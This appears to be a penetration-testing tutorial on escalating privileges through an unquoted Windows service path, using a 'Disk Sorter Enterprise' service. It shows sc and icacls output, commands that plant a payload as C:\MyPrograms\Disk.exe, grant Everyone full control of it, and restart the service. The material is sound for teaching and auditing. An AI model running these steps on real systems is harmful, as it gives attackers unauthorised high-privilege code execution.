Unquoted Service Paths

When working with Windows Services, a very particular behavior occurs when the Service is Configured to point to an Unquoted Executable. By unquoted, we mean that the Path of the associated executable isn't properly quoted to account for spaces on the Command.

Explanation

When the SCM (Service Control Manager) tries to Execute the Binary, a problem arises. Since there are Spaces on the Name of the "Disk Sorter Enterprise" Folder, the Command becomes Ambiguous.

The SCM doesn't know which of the Following you are trying to Execute:

Command	Argument [1]	Argument [2]
C:\MyPrograms\Disk.exe	Sorter	Enterprise\bin\DiskEnterprise.exe
C:\MyPrograms\Disk Sorter.exe	Enterprise\bin\DiskEnterprise.exe
C:\MyPrograms\Disk Sorter Enterprise\bin\DiskEnterprise.exe

Analyzing the Service

The Disk Sorter Enterprise Service has Unquoted Service Paths. If an Attacker creates any of the executables that are Searched for before the expected Service executable, they can Force the Service to run an Arbitrary Executable.

Command
Output

:: Query Service Information
sc qc "Disk Sorter Enterprise"

SERVICE_NAME: Disk Sorter Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\DiskEnterprise.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : "Username (Service Runs as this User)"

In our case, the Administrator installed the Disk Sorter Binaries under C:\MyPrograms. By Default, this inherits the Permissions of the C:\ Directory, which allows any User to Create Files and Folders in it. We can check this using icacls Command.

The BUILTIN\Users has the Append (AD) - Write Data (WD) Privileges, allowing the User to create Subdirectories and Files, respectively.

Command
Output

:: Show Folder Permissions
icacls C:\MyPrograms

C:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
              BUILTIN\Administrators:(I)(OI)(CI)(F)
              BUILTIN\Users:(I)(OI)(CI)(RX)
              BUILTIN\Users:(I)(CI)(AD)
              BUILTIN\Users:(I)(CI)(WD)
              CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Replacing the Service

Note

If we need another User to execute the PAYLOAD, we need to grant the Correct Permissions to the Service Executable. In this case we grant Full Permission (F) to the Everyone Group: Everyone:(F)

info

Check the Unquoted Service Paths (Explanation) if you don't know why we Placing the PAYLOAD in C:\MyPrograms\Disk.exe instead of Replacing the actual executable in the Folder.

:: Replace the Vulnerable Service Executable a PAYLOAD of your Preference
move C:\Payload\Path\Payload.exe C:\MyPrograms\Disk.exe

:: Assign new Permissions
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

Restarting the Service

Note

In a Normal case Scenario we would likely have to wait for the Service to Restart if we don't have the Required Permissions to Restart the Service.

In case we have the Required Permissions to Restart the Service, we can use the sc command.

sc stop  "Disk Sorter Enterprise"
sc start "Disk Sorter Enterprise"

Analyzing the Service​

Replacing the Service​

Restarting the Service​

Analyzing the Service

Replacing the Service

Restarting the Service